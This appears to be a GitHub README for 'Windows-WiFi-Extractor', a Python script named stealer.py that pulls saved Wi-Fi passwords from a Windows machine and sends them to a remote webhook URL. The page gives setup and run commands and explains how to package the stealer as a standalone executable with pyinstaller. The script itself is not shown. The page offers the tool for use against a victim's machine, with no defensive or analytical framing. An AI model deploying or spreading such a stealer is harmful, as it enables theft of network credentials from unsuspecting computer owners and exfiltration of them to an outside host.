hmaverickadams / Windows-WiFi-Extractor

Extract Windows Wi-Fi Passwords to Remote URL

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Windows-WiFi-Extractor

Extract Windows Wi-Fi Passwords to a Remote URL

Install

Before running, install the required modules:

pip3 install -r requirements.txt

Usage

To use, simply replace the url variable with your webhook and execute the following:

python stealer.py

Making an executable

If you want to be a fancy pants, you can convert this to an exe :)

pyinstaller --onefile stealer.py

About

Extract Windows Wi-Fi Passwords to Remote URL


Languages

Language:Python 100.0%